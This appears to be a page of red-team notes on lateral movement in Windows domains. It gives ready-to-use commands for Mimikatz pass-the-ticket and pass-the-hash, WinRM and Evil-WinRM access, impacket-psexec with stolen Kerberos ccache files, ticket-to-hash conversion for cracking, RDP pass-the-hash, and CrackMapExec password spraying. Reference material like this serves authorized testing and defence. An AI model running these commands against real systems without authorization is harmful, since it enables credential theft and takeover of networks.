Pentesting & Red Teaming Notes
Lateral Movement

There aren't many ways to move laterally on Windows. The main ones are:

  • psexec
  • RDP
  • WinRM
  • SSH (not likely)

PTH (pass the hash) can be used most of the time.

Mimikatz Ticket PTT

Enable-PSRemoting
mimikatz.exe "kerberos::ptt C:\Users\Public\ticketname.kirbi" "exit"
Enter-PSSession -ComputerName ECORP

WinRM

$pass = ConvertTo-SecureString 'supersecurepassword' -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential ('ECORP.local\morph3', $pass)
Invoke-Command -ComputerName DC -Credential $cred -ScriptBlock { whoami }

# Evil-WinRM
https://github.com/Hackplayers/evil-winrm
ruby evil-winrm.rb -i 192.168.1.2 -u morph3 -p morph3 -r evil.corp

PTH with Mimikatz

Invoke-Mimikatz -Command '"sekurlsa::pth /user:user /domain:domain /ntlm:hash /run:command"'

Pass The Ccache (PTC)

Grab the ccache file from the remote host and point the KRB5CCNAME environment variable at it:

export KRB5CCNAME=/home/morph3/Desktop/krb5cc_012345678_XXXX

Make sure the clock is synced with the DC, since Kerberos rejects tickets when the clock skew is too large:

sudo ntpdate -u 192.168.1.231

Run psexec against the target:

impacket-psexec morph3@dc01.domain.local -dc-ip 192.168.1.231 -k -no-pass

Note: don't include the domain name in the psexec target. If the command still fails, try dropping the username as well.

Cracking Ccache

Convert the ccache file into a kirbi file using a converter:

python2 /opt/ticket_converter/ticket_converter.py krb5cc_012345678_XXXX ticket.kirbi

Convert the kirbi file into a crackable hash:

python3 /opt/kerberoast/kirbi2john.py ticket.kirbi | tee ticket_hash.txt

RDP

Impacket's rdp_check.py script is a good way to check RDP access:

impacket-rdp_check morph3:Password123@1.3.3.7
python3 /opt/impacket/examples/rdp_check.py ecorp/morph3@1.3.3.7
xfreerdp /u:morph3 /p:Password123 /v:1.3.3.7
xfreerdp /u:morph3 /pth:08df3c74ded740e1f2bcf5dea4b8daf6 /v:1.3.3.7
rdesktop 1.3.3.7 -u Administrator -p 123456

CrackMapExec

Swiss-army-knife tool for password spraying.

crackmapexec smb ./ips.txt -u ./users -H hashes --local-auth
crackmapexec smb 1.3.3.7 -u ./users -p ./passwords --continue-on-success --shares

Last updated 2 years ago

I use

https://github.com/zer1t0/ticket_converter
https://github.com/nidem/kerberoast
https://github.com/jarilaos/kirbi2hashcat/blob/master/kirbi2hashcat.py
https://github.com/byt3bl33d3r/CrackMapExec